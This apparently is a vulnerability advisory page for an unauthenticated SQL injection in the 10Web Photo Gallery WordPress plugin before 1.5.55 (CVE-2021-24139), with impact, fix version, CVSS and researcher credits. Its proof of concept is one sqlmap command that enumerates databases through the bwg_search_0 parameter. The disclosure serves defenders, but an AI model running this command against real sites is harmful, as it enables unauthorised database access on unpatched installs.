Photo Gallery by 10Web < 1.5.55 – Unauthenticated SQL Injection | CVE 2021-24139 | Plugin Vulnerabilities

Description

SQL injection in the Photo Gallery (10Web Photo Gallery) plugin before 1.5.55 exists via the frontend/models/model.php bwg_search_x parameter.

Impact
All gallery_type is affected by this bug and any unauthenticated remote attacker can exploit the plugin.

Proof of Concept

Sqlmap payload:
sqlmap -u 'http://example.com/?p=19&bwg_search_0=*' --dbs --risk 3 --level 5 --threads 10 --tamper=space2comment -p bwg_search_0 -f

Video: https://drive.google.com/file/d/1W93XUz5qvWjB27Rn-9L9bIwpBXa2OFNJ/view?usp=sharing
Backup link: https://mega.nz/file/S8UxyYpY#p-QLIwouqWq9Q4OV34KNZ8Zo2a7IAKjXVYJ9HZuh2Yk

Affects Plugins

Fixed in 1.5.55

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2304193

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)

Submitter

Nguyen Anh Tien

Submitter website

https://research.sun-asterisk.com/

Submitter twitter

Verified

No

WPVDB ID

2e33088e-7b93-44af-aa6a-e5d924f86e28

Timeline

Publicly Published

2020-05-15 (about 5 years ago)

Added

2020-05-15 (about 5 years ago)

Last Updated

2021-01-22 (about 4 years ago)

Other

Published

Title

Published

2017-06-04

Title

Event List <= 0.7.8 - Authenticated SQL Injection

Published

2022-03-02

Title

Limit Login Attempts (Spam Protection) < 5.1 - Unauthenticated SQLi

Published

2024-08-26

Title

Woocommerce Addon by Greenshift< 1.9.8 - Authenticated (Subscriber+) SQL Injection

Published

2017-09-26

Title

Content Timeline <= 4.4.2 - Multiple Blind SQL Injection

Published

2022-12-05

Title

Contest Gallery < 19.1.5 - Author+ SQL Injection